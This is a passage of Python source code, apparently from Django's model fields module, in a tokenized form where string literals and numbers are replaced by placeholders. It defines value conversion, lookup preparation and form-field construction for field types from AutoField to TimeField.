get_db_prep_value ( self , value , connection , prepared = False ) : <EOL> """<STR_LIT>""" <EOL> if not prepared : <EOL> value = self . get_prep_value ( value ) <EOL> return value <EOL> def get_db_prep_save ( self , value , connection ) : <EOL> "<STR_LIT>" <EOL> return self . get_db_prep_value ( value , connection = connection , prepared = False ) <EOL> def get_prep_lookup ( self , lookup_type , value ) : <EOL> "<STR_LIT>" <EOL> if hasattr ( value , '<STR_LIT>' ) : <EOL> return value . prepare ( ) <EOL> if hasattr ( value , '<STR_LIT>' ) : <EOL> return value . _prepare ( ) <EOL> if lookup_type in ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ) : <EOL> return value <EOL> elif lookup_type in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return self . get_prep_value ( value ) <EOL> elif lookup_type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return [ self . get_prep_value ( v ) for v in value ] <EOL> elif lookup_type == '<STR_LIT>' : <EOL> try : <EOL> return int ( value ) <EOL> except ValueError : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> raise TypeError ( "<STR_LIT>" % lookup_type ) <EOL> def get_db_prep_lookup ( self , lookup_type , value , connection , prepared = False ) : <EOL> "<STR_LIT>" <EOL> if not prepared : <EOL> value = self . get_prep_lookup ( lookup_type , value ) <EOL> if hasattr ( value , '<STR_LIT>' ) : <EOL> value = value . get_compiler ( connection = connection ) <EOL> if hasattr ( value , '<STR_LIT>' ) or hasattr ( value , '<STR_LIT>' ) : <EOL> if hasattr ( value , '<STR_LIT>' ) : <EOL> return value <EOL> if hasattr ( value , '<STR_LIT>' ) : <EOL> sql , params = value . as_sql ( ) <EOL> else : <EOL> sql , params = value . _as_sql ( connection = connection ) <EOL> return QueryWrapper ( ( '<STR_LIT>' % sql ) , params ) <EOL> if lookup_type in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return [ value ] <EOL> elif lookup_type in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return [ self . get_db_prep_value ( value , connection = connection , prepared = prepared ) ] <EOL> elif lookup_type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return [ self . get_db_prep_value ( v , connection = connection , prepared = prepared ) for v in value ] <EOL> elif lookup_type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return [ "<STR_LIT>" % connection . ops . prep_for_like_query ( value ) ] <EOL> elif lookup_type == '<STR_LIT>' : <EOL> return [ connection . ops . prep_for_iexact_query ( value ) ] <EOL> elif lookup_type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return [ "<STR_LIT>" % connection . ops . prep_for_like_query ( value ) ] <EOL> elif lookup_type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return [ "<STR_LIT>" % connection . ops . prep_for_like_query ( value ) ] <EOL> elif lookup_type == '<STR_LIT>' : <EOL> return [ ] <EOL> elif lookup_type == '<STR_LIT>' : <EOL> if self . get_internal_type ( ) == '<STR_LIT>' : <EOL> return connection . ops . year_lookup_bounds_for_date_field ( value ) <EOL> else : <EOL> return connection . ops . year_lookup_bounds ( value ) <EOL> def has_default ( self ) : <EOL> "<STR_LIT>" <EOL> return self . default is not NOT_PROVIDED <EOL> def get_default ( self ) : <EOL> "<STR_LIT>" <EOL> if self . has_default ( ) : <EOL> if callable ( self . default ) : <EOL> return self . default ( ) <EOL> return force_unicode ( self . default , strings_only = True ) <EOL> if not self . empty_strings_allowed or ( self . null and not connection . features . interprets_empty_strings_as_nulls ) : <EOL> return None <EOL> return "<STR_LIT>" <EOL> def get_validator_unique_lookup_type ( self ) : <EOL> return '<STR_LIT>' % self . name <EOL> def get_choices ( self , include_blank = True , blank_choice = BLANK_CHOICE_DASH ) : <EOL> """<STR_LIT>""" <EOL> first_choice = include_blank and blank_choice or [ ] <EOL> if self . choices : <EOL> return first_choice + list ( self . choices ) <EOL> rel_model = self . rel . to <EOL> if hasattr ( self . rel , '<STR_LIT>' ) : <EOL> lst = [ ( getattr ( x , self . rel . get_related_field ( ) . attname ) , smart_unicode ( x ) ) for x in rel_model . _default_manager . complex_filter ( self . rel . limit_choices_to ) ] <EOL> else : <EOL> lst = [ ( x . _get_pk_val ( ) , smart_unicode ( x ) ) for x in rel_model . _default_manager . complex_filter ( self . rel . limit_choices_to ) ] <EOL> return first_choice + lst <EOL> def get_choices_default ( self ) : <EOL> return self . get_choices ( ) <EOL> def get_flatchoices ( self , include_blank = True , blank_choice = BLANK_CHOICE_DASH ) : <EOL> "<STR_LIT>" <EOL> first_choice = include_blank and blank_choice or [ ] <EOL> return first_choice + list ( self . flatchoices ) <EOL> def _get_val_from_obj ( self , obj ) : <EOL> if obj is not None : <EOL> return getattr ( obj , self . attname ) <EOL> else : <EOL> return self . get_default ( ) <EOL> def value_to_string ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> return smart_unicode ( self . _get_val_from_obj ( obj ) ) <EOL> def bind ( self , fieldmapping , original , bound_field_class ) : <EOL> return bound_field_class ( self , fieldmapping , original ) <EOL> def _get_choices ( self ) : <EOL> if hasattr ( self . _choices , '<STR_LIT>' ) : <EOL> choices , self . _choices = tee ( self . _choices ) <EOL> return choices <EOL> else : <EOL> return self . _choices <EOL> choices = property ( _get_choices ) <EOL> def _get_flatchoices ( self ) : <EOL> """<STR_LIT>""" <EOL> flat = [ ] <EOL> for choice , value in self . choices : <EOL> if isinstance ( value , ( list , tuple ) ) : <EOL> flat . extend ( value ) <EOL> else : <EOL> flat . append ( ( choice , value ) ) <EOL> return flat <EOL> flatchoices = property ( _get_flatchoices ) <EOL> def save_form_data ( self , instance , data ) : <EOL> setattr ( instance , self . name , data ) <EOL> def formfield ( self , form_class = forms . CharField , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> defaults = { '<STR_LIT>' : not self . blank , '<STR_LIT:label>' : capfirst ( self . verbose_name ) , '<STR_LIT>' : self . help_text } <EOL> if self . has_default ( ) : <EOL> if callable ( self . default ) : <EOL> defaults [ '<STR_LIT>' ] = self . default <EOL> defaults [ '<STR_LIT>' ] = True <EOL> else : <EOL> defaults [ '<STR_LIT>' ] = self . get_default ( ) <EOL> if self . choices : <EOL> include_blank = self . blank or not ( self . has_default ( ) or '<STR_LIT>' in kwargs ) <EOL> defaults [ '<STR_LIT>' ] = self . get_choices ( include_blank = include_blank ) <EOL> defaults [ '<STR_LIT>' ] = self . to_python <EOL> if self . null : <EOL> defaults [ '<STR_LIT>' ] = None <EOL> form_class = forms . TypedChoiceField <EOL> for k in kwargs . keys ( ) : <EOL> if k not in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:label>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) : <EOL> del kwargs [ k ] <EOL> defaults . update ( kwargs ) <EOL> return form_class ( ** defaults ) <EOL> def value_from_object ( self , obj ) : <EOL> "<STR_LIT>" <EOL> return getattr ( obj , self . attname ) <EOL> class AutoField ( Field ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> empty_strings_allowed = False <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> assert kwargs . get ( '<STR_LIT:primary_key>' , False ) is True , "<STR_LIT>" % self . __class__ . __name__ <EOL> kwargs [ '<STR_LIT:blank>' ] = True <EOL> Field . __init__ ( self , * args , ** kwargs ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def to_python ( self , value ) : <EOL> if value is None : <EOL> return value <EOL> try : <EOL> return int ( value ) <EOL> except ( TypeError , ValueError ) : <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> def validate ( self , value , model_instance ) : <EOL> pass <EOL> def get_prep_value ( self , value ) : <EOL> if value is None : <EOL> return None <EOL> return int ( value ) <EOL> def contribute_to_class ( self , cls , name ) : <EOL> assert not cls . _meta . has_auto_field , "<STR_LIT>" <EOL> super ( AutoField , self ) . contribute_to_class ( cls , name ) <EOL> cls . _meta . has_auto_field = True <EOL> cls . _meta . auto_field = self <EOL> def formfield ( self , ** kwargs ) : <EOL> return None <EOL> class BooleanField ( Field ) : <EOL> empty_strings_allowed = False <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs [ '<STR_LIT:blank>' ] = True <EOL> if '<STR_LIT:default>' not in kwargs and not kwargs . get ( '<STR_LIT:null>' ) : <EOL> kwargs [ '<STR_LIT:default>' ] = False <EOL> Field . __init__ ( self , * args , ** kwargs ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def to_python ( self , value ) : <EOL> if value in ( True , False ) : <EOL> return bool ( value ) <EOL> if value in ( '<STR_LIT:t>' , '<STR_LIT:True>' , '<STR_LIT:1>' ) : <EOL> return True <EOL> if value in ( '<STR_LIT:f>' , '<STR_LIT:False>' , '<STR_LIT:0>' ) : <EOL> return False <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> def get_prep_lookup ( self , lookup_type , value ) : <EOL> if value in ( '<STR_LIT:1>' , '<STR_LIT:0>' ) : <EOL> value = bool ( int ( value ) ) <EOL> return super ( BooleanField , self ) . get_prep_lookup ( lookup_type , value ) <EOL> def get_prep_value ( self , value ) : <EOL> if value is None : <EOL> return None <EOL> return bool ( value ) <EOL> def formfield ( self , ** kwargs ) : <EOL> if self . choices : <EOL> include_blank = self . null or not ( self . has_default ( ) or '<STR_LIT>' in kwargs ) <EOL> defaults = { '<STR_LIT>' : self . get_choices ( include_blank = include_blank ) } <EOL> else : <EOL> defaults = { '<STR_LIT>' : forms . BooleanField } <EOL> defaults . update ( kwargs ) <EOL> return super ( BooleanField , self ) . formfield ( ** defaults ) <EOL> class CharField ( Field ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( CharField , self ) . __init__ ( * args , ** kwargs ) <EOL> self . validators . append ( validators . MaxLengthValidator ( self . max_length ) ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def to_python ( self , value ) : <EOL> if isinstance ( value , basestring ) or value is None : <EOL> return value <EOL> return smart_unicode ( value ) <EOL> def get_prep_value ( self , value ) : <EOL> return self . to_python ( value ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT:max_length>' : self . max_length } <EOL> defaults . update ( kwargs ) <EOL> return super ( CharField , self ) . formfield ( ** defaults ) <EOL> class CommaSeparatedIntegerField ( CharField ) : <EOL> default_validators = [ validators . validate_comma_separated_integer_list ] <EOL> description = _ ( "<STR_LIT>" ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return super ( CommaSeparatedIntegerField , self ) . formfield ( ** defaults ) <EOL> ansi_date_re = re . compile ( r'<STR_LIT>' ) <EOL> class DateField ( Field ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> empty_strings_allowed = False <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , verbose_name = None , name = None , auto_now = False , auto_now_add = False , ** kwargs ) : <EOL> self . auto_now , self . auto_now_add = auto_now , auto_now_add <EOL> if auto_now or auto_now_add : <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> kwargs [ '<STR_LIT:blank>' ] = True <EOL> Field . __init__ ( self , verbose_name , name , ** kwargs ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def to_python ( self , value ) : <EOL> if value is None : <EOL> return value <EOL> if isinstance ( value , datetime . datetime ) : <EOL> return value . date ( ) <EOL> if isinstance ( value , datetime . date ) : <EOL> return value <EOL> if not ansi_date_re . search ( value ) : <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> year , month , day = map ( int , value . split ( '<STR_LIT:->' ) ) <EOL> try : <EOL> return datetime . date ( year , month , day ) <EOL> except ValueError , e : <EOL> msg = self . error_messages [ '<STR_LIT>' ] % _ ( str ( e ) ) <EOL> raise exceptions . ValidationError ( msg ) <EOL> def pre_save ( self , model_instance , add ) : <EOL> if self . auto_now or ( self . auto_now_add and add ) : <EOL> value = datetime . date . today ( ) <EOL> setattr ( model_instance , self . attname , value ) <EOL> return value <EOL> else : <EOL> return super ( DateField , self ) . pre_save ( model_instance , add ) <EOL> def contribute_to_class ( self , cls , name ) : <EOL> super ( DateField , self ) . contribute_to_class ( cls , name ) <EOL> if not self . null : <EOL> setattr ( cls , '<STR_LIT>' % self . name , <EOL> curry ( cls . _get_next_or_previous_by_FIELD , field = self , is_next = True ) ) <EOL> setattr ( cls , '<STR_LIT>' % self . name , <EOL> curry ( cls . _get_next_or_previous_by_FIELD , field = self , is_next = False ) ) <EOL> def get_prep_lookup ( self , lookup_type , value ) : <EOL> if lookup_type in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return int ( value ) <EOL> return super ( DateField , self ) . get_prep_lookup ( lookup_type , value ) <EOL> def get_prep_value ( self , value ) : <EOL> return self . to_python ( value ) <EOL> def get_db_prep_value ( self , value , connection , prepared = False ) : <EOL> if not prepared : <EOL> value = self . get_prep_value ( value ) <EOL> return connection . ops . value_to_db_date ( value ) <EOL> def value_to_string ( self , obj ) : <EOL> val = self . _get_val_from_obj ( obj ) <EOL> if val is None : <EOL> data = '<STR_LIT>' <EOL> else : <EOL> data = datetime_safe . new_date ( val ) . strftime ( "<STR_LIT>" ) <EOL> return data <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : forms . DateField } <EOL> defaults . update ( kwargs ) <EOL> return super ( DateField , self ) . formfield ( ** defaults ) <EOL> class DateTimeField ( DateField ) : <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> description = _ ( "<STR_LIT>" ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def to_python ( self , value ) : <EOL> if value is None : <EOL> return value <EOL> if isinstance ( value , datetime . datetime ) : <EOL> return value <EOL> if isinstance ( value , datetime . date ) : <EOL> return datetime . datetime ( value . year , value . month , value . day ) <EOL> value = smart_str ( value ) <EOL> if '<STR_LIT:.>' in value : <EOL> try : <EOL> value , usecs = value . split ( '<STR_LIT:.>' ) <EOL> usecs = int ( usecs ) <EOL> except ValueError : <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> else : <EOL> usecs = <NUM_LIT:0> <EOL> kwargs = { '<STR_LIT>' : usecs } <EOL> try : <EOL> return datetime . datetime ( * time . strptime ( value , '<STR_LIT>' ) [ : <NUM_LIT:6> ] , <EOL> ** kwargs ) <EOL> except ValueError : <EOL> try : <EOL> return datetime . datetime ( * time . strptime ( value , '<STR_LIT>' ) [ : <NUM_LIT:5> ] , <EOL> ** kwargs ) <EOL> except ValueError : <EOL> try : <EOL> return datetime . datetime ( * time . strptime ( value , '<STR_LIT>' ) [ : <NUM_LIT:3> ] , <EOL> ** kwargs ) <EOL> except ValueError : <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> def pre_save ( self , model_instance , add ) : <EOL> if self . auto_now or ( self . auto_now_add and add ) : <EOL> value = datetime . datetime . now ( ) <EOL> setattr ( model_instance , self . attname , value ) <EOL> return value <EOL> else : <EOL> return super ( DateTimeField , self ) . pre_save ( model_instance , add ) <EOL> def get_prep_value ( self , value ) : <EOL> return self . to_python ( value ) <EOL> def get_db_prep_value ( self , value , connection , prepared = False ) : <EOL> if not prepared : <EOL> value = self . get_prep_value ( value ) <EOL> return connection . ops . value_to_db_datetime ( value ) <EOL> def value_to_string ( self , obj ) : <EOL> val = self . _get_val_from_obj ( obj ) <EOL> if val is None : <EOL> data = '<STR_LIT>' <EOL> else : <EOL> d = datetime_safe . new_datetime ( val ) <EOL> data = d . strftime ( '<STR_LIT>' ) <EOL> return data <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : forms . DateTimeField } <EOL> defaults . update ( kwargs ) <EOL> return super ( DateTimeField , self ) . formfield ( ** defaults ) <EOL> class DecimalField ( Field ) : <EOL> empty_strings_allowed = False <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , verbose_name = None , name = None , max_digits = None , decimal_places = None , ** kwargs ) : <EOL> self . max_digits , self . decimal_places = max_digits , decimal_places <EOL> Field . __init__ ( self , verbose_name , name , ** kwargs ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def to_python ( self , value ) : <EOL> if value is None : <EOL> return value <EOL> try : <EOL> return decimal . Decimal ( value ) <EOL> except decimal . InvalidOperation : <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> def _format ( self , value ) : <EOL> if isinstance ( value , basestring ) or value is None : <EOL> return value <EOL> else : <EOL> return self . format_number ( value ) <EOL> def format_number ( self , value ) : <EOL> """<STR_LIT>""" <EOL> from django . db . backends import util <EOL> return util . format_number ( value , self . max_digits , self . decimal_places ) <EOL> def get_db_prep_save ( self , value , connection ) : <EOL> return connection . ops . value_to_db_decimal ( self . to_python ( value ) , <EOL> self . max_digits , self . decimal_places ) <EOL> def get_prep_value ( self , value ) : <EOL> return self . to_python ( value ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { <EOL> '<STR_LIT>' : self . max_digits , <EOL> '<STR_LIT>' : self . decimal_places , <EOL> '<STR_LIT>' : forms . DecimalField , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return super ( DecimalField , self ) . formfield ( ** defaults ) <EOL> class EmailField ( CharField ) : <EOL> default_validators = [ validators . validate_email ] <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs [ '<STR_LIT:max_length>' ] = kwargs . get ( '<STR_LIT:max_length>' , <NUM_LIT> ) <EOL> CharField . __init__ ( self , * args , ** kwargs ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { <EOL> '<STR_LIT>' : forms . EmailField , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return super ( EmailField , self ) . formfield ( ** defaults ) <EOL> class FilePathField ( Field ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , verbose_name = None , name = None , path = '<STR_LIT>' , match = None , recursive = False , ** kwargs ) : <EOL> self . path , self . match , self . recursive = path , match , recursive <EOL> kwargs [ '<STR_LIT:max_length>' ] = kwargs . get ( '<STR_LIT:max_length>' , <NUM_LIT:100> ) <EOL> Field . __init__ ( self , verbose_name , name , ** kwargs ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { <EOL> '<STR_LIT:path>' : self . path , <EOL> '<STR_LIT>' : self . match , <EOL> '<STR_LIT>' : self . recursive , <EOL> '<STR_LIT>' : forms . FilePathField , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return super ( FilePathField , self ) . formfield ( ** defaults ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> class FloatField ( Field ) : <EOL> empty_strings_allowed = False <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( "<STR_LIT>" ) , <EOL> } <EOL> description = _ ( "<STR_LIT>" ) <EOL> def get_prep_value ( self , value ) : <EOL> if value is None : <EOL> return None <EOL> return float ( value ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def to_python ( self , value ) : <EOL> if value is None : <EOL> return value <EOL> try : <EOL> return float ( value ) <EOL> except ( TypeError , ValueError ) : <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : forms . FloatField } <EOL> defaults . update ( kwargs ) <EOL> return super ( FloatField , self ) . formfield ( ** defaults ) <EOL> class IntegerField ( Field ) : <EOL> empty_strings_allowed = False <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( "<STR_LIT>" ) , <EOL> } <EOL> description = _ ( "<STR_LIT>" ) <EOL> def get_prep_value ( self , value ) : <EOL> if value is None : <EOL> return None <EOL> return int ( value ) <EOL> def get_prep_lookup ( self , lookup_type , value ) : <EOL> if ( lookup_type == '<STR_LIT>' or lookup_type == '<STR_LIT>' ) and isinstance ( value , float ) : <EOL> value = math . ceil ( value ) <EOL> return super ( IntegerField , self ) . get_prep_lookup ( lookup_type , value ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def to_python ( self , value ) : <EOL> if value is None : <EOL> return value <EOL> try : <EOL> return int ( value ) <EOL> except ( TypeError , ValueError ) : <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : forms . IntegerField } <EOL> defaults . update ( kwargs ) <EOL> return super ( IntegerField , self ) . formfield ( ** defaults ) <EOL> class BigIntegerField ( IntegerField ) : <EOL> empty_strings_allowed = False <EOL> description = _ ( "<STR_LIT>" ) <EOL> MAX_BIGINT = <NUM_LIT> <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : - BigIntegerField . MAX_BIGINT - <NUM_LIT:1> , <EOL> '<STR_LIT>' : BigIntegerField . MAX_BIGINT } <EOL> defaults . update ( kwargs ) <EOL> return super ( BigIntegerField , self ) . formfield ( ** defaults ) <EOL> class IPAddressField ( Field ) : <EOL> empty_strings_allowed = False <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs [ '<STR_LIT:max_length>' ] = <NUM_LIT:15> <EOL> Field . __init__ ( self , * args , ** kwargs ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : forms . IPAddressField } <EOL> defaults . update ( kwargs ) <EOL> return super ( IPAddressField , self ) . formfield ( ** defaults ) <EOL> class NullBooleanField ( Field ) : <EOL> empty_strings_allowed = False <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( "<STR_LIT>" ) , <EOL> } <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs [ '<STR_LIT:null>' ] = True <EOL> kwargs [ '<STR_LIT:blank>' ] = True <EOL> Field . __init__ ( self , * args , ** kwargs ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def to_python ( self , value ) : <EOL> if value is None : <EOL> return None <EOL> if value in ( True , False ) : <EOL> return bool ( value ) <EOL> if value in ( '<STR_LIT:None>' , ) : <EOL> return None <EOL> if value in ( '<STR_LIT:t>' , '<STR_LIT:True>' , '<STR_LIT:1>' ) : <EOL> return True <EOL> if value in ( '<STR_LIT:f>' , '<STR_LIT:False>' , '<STR_LIT:0>' ) : <EOL> return False <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> def get_prep_lookup ( self , lookup_type , value ) : <EOL> if value in ( '<STR_LIT:1>' , '<STR_LIT:0>' ) : <EOL> value = bool ( int ( value ) ) <EOL> return super ( NullBooleanField , self ) . get_prep_lookup ( lookup_type , value ) <EOL> def get_prep_value ( self , value ) : <EOL> if value is None : <EOL> return None <EOL> return bool ( value ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { <EOL> '<STR_LIT>' : forms . NullBooleanField , <EOL> '<STR_LIT>' : not self . blank , <EOL> '<STR_LIT:label>' : capfirst ( self . verbose_name ) , <EOL> '<STR_LIT>' : self . help_text } <EOL> defaults . update ( kwargs ) <EOL> return super ( NullBooleanField , self ) . formfield ( ** defaults ) <EOL> class PositiveIntegerField ( IntegerField ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : <NUM_LIT:0> } <EOL> defaults . update ( kwargs ) <EOL> return super ( PositiveIntegerField , self ) . formfield ( ** defaults ) <EOL> class PositiveSmallIntegerField ( IntegerField ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : <NUM_LIT:0> } <EOL> defaults . update ( kwargs ) <EOL> return super ( PositiveSmallIntegerField , self ) . formfield ( ** defaults ) <EOL> class SlugField ( CharField ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs [ '<STR_LIT:max_length>' ] = kwargs . get ( '<STR_LIT:max_length>' , <NUM_LIT:50> ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> super ( SlugField , self ) . __init__ ( * args , ** kwargs ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : forms . SlugField } <EOL> defaults . update ( kwargs ) <EOL> return super ( SlugField , self ) . formfield ( ** defaults ) <EOL> class SmallIntegerField ( IntegerField ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> class TextField ( Field ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def get_prep_value ( self , value ) : <EOL> if isinstance ( value , basestring ) or value is None : <EOL> return value <EOL> return smart_unicode ( value ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : forms . Textarea } <EOL> defaults . update ( kwargs ) <EOL> return super ( TextField , self ) . formfield ( ** defaults ) <EOL> class TimeField ( Field ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> empty_strings_allowed = False <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , verbose_name = None , name = None , auto_now = False , auto_now_add = False , ** kwargs ) : <EOL> self . auto_now , self . auto_now_add = auto_now , auto_now_add <EOL> if auto_now or auto_now_add : <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> Field . __init__ ( self , verbose_name , name , ** kwargs ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def to_python ( self , value ) : <EOL> if value is None : <EOL> return None <EOL> if isinstance ( value , datetime . time ) : <EOL> return value <EOL> if isinstance ( value , datetime . datetime ) : <EOL> return value . time ( ) <EOL> value = smart_str ( value ) <EOL> if '<STR_LIT:.>' in value : <EOL> try : <EOL> value , usecs = value . split ( '<STR_LIT:.>' ) <EOL> usecs = int ( usecs ) <EOL> except ValueError : <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> else : <EOL> usecs = <NUM_LIT:0> <EOL> kwargs = { '<STR_LIT>' : usecs } <EOL> try : <EOL> return datetime . time ( * time . strptime ( value , '<STR_LIT>' ) [ <NUM_LIT:3> : <NUM_LIT:6> ] , <EOL> ** kwargs ) <EOL> except ValueError : <EOL> try : <EOL> return datetime . time ( * time . strptime ( value , '<STR_LIT>' ) [ <NUM_LIT:3> : <NUM_LIT:5> ] , <EOL> ** kwargs ) <EOL> except ValueError : <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> def pre_save ( self , model_instance , add ) : <EOL> if self . auto_now or ( self . auto_now_add and add ) : <EOL> value = datetime . datetime . now ( ) . time ( ) <EOL> setattr ( model_instance , self . attname , value ) <EOL> return value <EOL> else : <EOL> return super ( TimeField , self ) . pre_save ( model_instance , add ) <EOL> def get_prep_value ( self , value ) : <EOL> return self . to_python ( value ) <EOL> def get_db_prep_value ( self , value , connection , prepared = False ) : <EOL> if not prepared : <EOL> value = self . get_prep_value ( value ) <EOL> return connection . ops . value_to_db_time ( value ) <EOL> def value_to_string ( self , obj ) : <EOL> val = self . _get_val_from_obj ( obj ) <EOL> if val is None : <EOL> data = '<STR_LIT>' <EOL> else : <EOL> data = val . strftime ( "<STR_LIT>" ) <EOL> return data <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : forms . TimeField } <EOL> defaults . update ( kwargs ) <EOL> return super ( TimeField , self ) . formfield ( ** defaults ) <EOL> class URLField ( CharField ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , verbose_name = None , name = None , verify_exists = True , ** kwargs ) : <EOL> kwargs [ 